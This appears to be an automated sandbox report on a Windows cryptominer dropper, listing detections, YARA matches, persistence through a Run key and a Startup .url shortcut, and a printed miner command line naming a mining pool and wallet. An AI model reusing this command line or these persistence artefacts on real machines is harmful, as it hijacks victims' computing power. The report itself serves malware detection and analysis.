                Source: 01904399.dat.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                Source: Yara matchFile source: 01904399.dat.exe, type: SAMPLE
                Source: Yara matchFile source: 0.0.01904399.dat.exe.380000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.551027505.00000000005FC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 01904399.dat.exe PID: 5684, type: MEMORYSTR
                Source: Driver.exe.0.drStatic PE information: section name: .MPRESS1
                Source: Driver.exe.0.drStatic PE information: section name: .MPRESS2
                Source: initial sampleStatic PE information: section where entry point is pointing to: .MPRESS2
                Source: Driver.exe.0.drStatic PE information: real checksum: 0x3f8bb4 should be: 0x3fb52d
                Source: C:\Users\user\Desktop\01904399.dat.exeFile created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeJump to dropped file
                Source: C:\Users\user\Desktop\01904399.dat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.urlJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.urlJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run DriverJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run DriverJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess information queried: ProcessInformationJump to behavior
                Source: Driver.exe, 00000001.00000002.822561306.000000000053B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeCode function: 0_2_00FC2AE8 LdrInitializeThunk,0_2_00FC2AE8
                Source: C:\Users\user\Desktop\01904399.dat.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2Jump to behavior
                Source: conhost.exe, 00000002.00000002.822792386.000001C49C5C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
                Source: conhost.exe, 00000002.00000002.822792386.000001C49C5C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: conhost.exe, 00000002.00000002.822792386.000001C49C5C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: conhost.exe, 00000002.00000002.822792386.000001C49C5C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\01904399.dat.exeQueries volume information: C:\Users\user\Desktop\01904399.dat.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\01904399.dat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeQueries volume information: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeQueries volume information: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeQueries volume information: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management Instrumentation21
                Registry Run Keys / Startup Folder
                12
                Process Injection
                1
                Masquerading
                1
                Input Capture
                11
                Security Software Discovery
                Remote Services1
                Input Capture
                Exfiltration Over Other Network Medium1
                Encrypted Channel
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts21
                Registry Run Keys / Startup Folder
                1
                Disable or Modify Tools
                LSASS Memory2
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                Exfiltration Over Bluetooth1
                Non-Standard Port
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)12
                Process Injection
                Security Account Manager1
                Remote System Discovery
                SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                Obfuscated Files or Information
                NTDS1
                File and Directory Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer1
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets11
                System Information Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                01904399.dat.exe81%ReversingLabsByteCode-MSIL.Coinminer.Malxmr
                01904399.dat.exe77%VirustotalBrowse
                01904399.dat.exe100%AviraTR/ATRAPS.Gen
                01904399.dat.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe71%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
                C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe70%VirustotalBrowse
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                pool-fr.supportxmr.com
                141.94.96.195
                truefalse
                  high
                  pool.supportxmr.com
                  unknown
                  unknownfalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    141.94.96.71
                    unknownGermany
                    680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue
                    Joe Sandbox Version:37.1.0 Beryl
                    Analysis ID:876764
                    Start date and time:2023-05-27 11:21:02 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 25s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:6
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample file name:01904399.dat.exe
                    Detection:MAL
                    Classification:mal100.troj.expl.mine.winEXE@7/2@1/1
                    EGA Information:
                    • Successful, ratio: 75%
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 56
                    • Number of non-executed functions: 9
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                    • Execution Graph export aborted for target 01904399.dat.exe, PID 676 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    TimeTypeDescription
                    11:22:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe
                    11:22:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe
                    11:22:33AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    141.94.96.71file.exeGet hashmaliciousXmrigBrowse
                      file.exeGet hashmaliciousXmrigBrowse
                        KMSPicoSetup.exeGet hashmaliciousXmrigBrowse
                          target.ps1Get hashmaliciousXmrigBrowse
                            file.exeGet hashmaliciousLoaderBot, XmrigBrowse
                              file.exeGet hashmaliciousRHADAMANTHYS, Vidar, XmrigBrowse
                                file.exeGet hashmaliciousPrivateLoader, RHADAMANTHYS, XmrigBrowse
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  pool-fr.supportxmr.comVsob3IooE7.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.144
                                  ruZVRNvu0Y.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                  • 141.94.96.71
                                  GameBar.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.71
                                  FTrondtloadws.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.71
                                  file.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.71
                                  file.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.144
                                  GoogleUpdate.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.144
                                  KMSPicoSetup.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.195
                                  WvWlWr2HC0.exeGet hashmaliciousLoaderBot, RedLine, SmokeLoader, Vidar, Xmrig, zgRATBrowse
                                  • 141.94.96.144
                                  spread.exeGet hashmaliciousETERNALBLUE, XmrigBrowse
                                  • 141.94.96.144
                                  target.ps1Get hashmaliciousXmrigBrowse
                                  • 141.94.96.144
                                  Activator.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.144
                                  d.pyGet hashmaliciousPwnRig MinerBrowse
                                  • 141.94.96.71
                                  file.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                  • 141.94.96.195
                                  PYnsVrS3EX.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.71
                                  PYnsVrS3EX.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.71
                                  file.exeGet hashmaliciousRHADAMANTHYS, RedLine, XmrigBrowse
                                  • 141.94.96.71
                                  DHL ORIGINAL DOCUMENTS.exeGet hashmaliciousRHADAMANTHYS, XmrigBrowse
                                  • 141.94.96.71
                                  DHL Original Documents.exeGet hashmaliciousRHADAMANTHYS, XmrigBrowse
                                  • 141.94.96.144
                                  file.exeGet hashmaliciousRHADAMANTHYS, Vidar, XmrigBrowse
                                  • 141.94.96.71
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetiOxLaAfn6.elfGet hashmaliciousMiraiBrowse
                                  • 141.50.141.19
                                  https://filehippo.com/download_postgresql/9.1.5/Get hashmaliciousUnknownBrowse
                                  • 141.94.171.215
                                  https://urlz.fr/lW3zGet hashmaliciousUnknownBrowse
                                  • 141.95.171.142
                                  http://aarp.org/researchGet hashmaliciousHTMLPhisherBrowse
                                  • 141.94.171.216
                                  https://tux-typing.fr.softonic.comGet hashmaliciousUnknownBrowse
                                  • 141.95.171.141
                                  Vsob3IooE7.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.144
                                  MTSpago3242142023.xlsGet hashmaliciousGuLoaderBrowse
                                  • 141.94.149.125
                                  D4EATj8S1c.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 141.9.112.43
                                  c7n8Y8b877.elfGet hashmaliciousUnknownBrowse
                                  • 212.201.156.65
                                  xyK0juuSuG.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 134.77.67.255
                                  ruZVRNvu0Y.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                  • 141.94.96.195
                                  GameBar.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.144
                                  SPL242523535252525235.xlsGet hashmaliciousFormBookBrowse
                                  • 141.94.149.125
                                  feobBkGOei.elfGet hashmaliciousMiraiBrowse
                                  • 195.37.8.77
                                  VsAKb3sxAu.elfGet hashmaliciousMiraiBrowse
                                  • 141.65.230.90
                                  iHDZW6bttX.elfGet hashmaliciousMiraiBrowse
                                  • 193.174.13.220
                                  OBBVGwjkM1.elfGet hashmaliciousMiraiBrowse
                                  • 141.60.164.212
                                  FWcYZPr3YJ.elfGet hashmaliciousUnknownBrowse
                                  • 141.65.242.27
                                  p1FejiLL02.elfGet hashmaliciousMiraiBrowse
                                  • 130.183.198.220
                                  xoeNOJm8Gu.elfGet hashmaliciousUnknownBrowse
                                  • 130.183.251.24
                                  No context
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeVsob3IooE7.exeGet hashmaliciousXmrigBrowse
                                    ruZVRNvu0Y.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                      file.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                        WvWlWr2HC0.exeGet hashmaliciousLoaderBot, RedLine, SmokeLoader, Vidar, Xmrig, zgRATBrowse
                                          file.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                            8ulUl36eYw.exeGet hashmaliciousFabookie, ManusCrypt, PrivateLoader, Raccoon Stealer v2, RedLine, SmokeLoader, TofseeBrowse
                                              file.exeGet hashmaliciousRedLine, XmrigBrowse
                                                2CH4QX76nU.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                  mQRqXgFxJR.exeGet hashmaliciousLoaderBot XmrigBrowse
                                                    tIH5DUSVGF.exeGet hashmaliciousLoaderBot XmrigBrowse
                                                      rnFMPDf3RV.exeGet hashmaliciousLoaderBot RedLine XmrigBrowse
                                                        VJO8DJVqC0.exeGet hashmaliciousLoaderBot XmrigBrowse
                                                          lcDlB6uuzr.exeGet hashmaliciousLoaderBot RedLine XmrigBrowse
                                                            3Yfr0pHudU.exeGet hashmaliciousLoaderBot XmrigBrowse
                                                              5622_1647967473_729.exeGet hashmaliciousXmrigBrowse
                                                                2862_1647970205_130.exeGet hashmaliciousXmrigBrowse
                                                                  SGH9m3w8Hx.exeGet hashmaliciousXmrigBrowse
                                                                    WQw4XERnFl.exeGet hashmaliciousXmrigBrowse
                                                                      8vprKeDXuJ.exeGet hashmaliciousRedLine XmrigBrowse
                                                                        4nmeEJrZJ9.exeGet hashmaliciousPhoenix Stealer XmrigBrowse
                                                                          Process:C:\Users\user\Desktop\01904399.dat.exe
                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<file:///C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe>), ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):168
                                                                          Entropy (8bit):5.1739624008988345
                                                                          Encrypted:false
                                                                          SSDEEP:3:HRAbABGQYm5uOt+kiEaKC5SQn+cVp1EQJ4ovstwWDt+WfWVUY1TEiWXU:HRYFVmwOwknaZ5ljv1EQJlvstwWDwv+8
                                                                          MD5:A8B170918085F6C5759A2AE873617DB7
                                                                          SHA1:103F652A0218AC82554B914519C68230CF2BC81A
                                                                          SHA-256:CDE88B7687C1D32F6A6C51AD0AE2A3C19F0C59EC0E2661CCD20475DD4BC7D695
                                                                          SHA-512:2E42921FD89B0B450696CEF4105C287E34B422F48E43FE2330673A6C3AD13351EA9000312354E7455EA774CBD885D23EA859CDBBF57B5F53B3A5E9133E459C4F
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: URL_File_Local_EXE, Description: Detects an .url file that points to a local executable, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url, Author: Florian Roth (Nextron Systems)
                                                                          • Rule: Methodology_Suspicious_Shortcut_Local_URL, Description: Detects local script usage for .URL persistence, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url, Author: @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
                                                                          Preview:[InternetShortcut]..URL=file:///C:\Users\user\AppData\Roaming\Sysfiles\01904399.dat.exe..IconIndex=0..IconFile=C:\Users\user\Desktop\01904399.dat.exe\backup (3).ico..
                                                                          Process:C:\Users\user\Desktop\01904399.dat.exe
                                                                          File Type:MS-DOS executable PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                                          Category:dropped
                                                                          Size (bytes):4141064
                                                                          Entropy (8bit):5.210440836800201
                                                                          Encrypted:false
                                                                          SSDEEP:49152:SNDFFPJu8fBsVE6ij+RNg+UKpBvtqB3m1RC3Z:wzP88fBsnZTgOtqB3m1RC3Z
                                                                          MD5:02569A7A91A71133D4A1023BF32AA6F4
                                                                          SHA1:0F16BCB3F3F085D3D3BE912195558E9F9680D574
                                                                          SHA-256:8D6ABBA9B216172CFC64B8802DB0D20A1C634C96E1049F451EDDBA2363966BF0
                                                                          SHA-512:534BE1FE93EE556A14CFD8FAD5377F57FB056AB4CD2BCA14E4F376F4A25D3D4D270917D68A90B3C40D8A8DAAEBA6F592FA095ECFF478332BA23405D1DF728322
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                          • Antivirus: Virustotal, Detection: 70%, Browse
                                                                          Joe Sandbox View:
                                                                          • Filename: Vsob3IooE7.exe, Detection: malicious, Browse
                                                                          • Filename: ruZVRNvu0Y.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: WvWlWr2HC0.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: 8ulUl36eYw.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: 2CH4QX76nU.exe, Detection: malicious, Browse
                                                                          • Filename: mQRqXgFxJR.exe, Detection: malicious, Browse
                                                                          • Filename: tIH5DUSVGF.exe, Detection: malicious, Browse
                                                                          • Filename: rnFMPDf3RV.exe, Detection: malicious, Browse
                                                                          • Filename: VJO8DJVqC0.exe, Detection: malicious, Browse
                                                                          • Filename: lcDlB6uuzr.exe, Detection: malicious, Browse
                                                                          • Filename: 3Yfr0pHudU.exe, Detection: malicious, Browse
                                                                          • Filename: 5622_1647967473_729.exe, Detection: malicious, Browse
                                                                          • Filename: 2862_1647970205_130.exe, Detection: malicious, Browse
                                                                          • Filename: SGH9m3w8Hx.exe, Detection: malicious, Browse
                                                                          • Filename: WQw4XERnFl.exe, Detection: malicious, Browse
                                                                          • Filename: 8vprKeDXuJ.exe, Detection: malicious, Browse
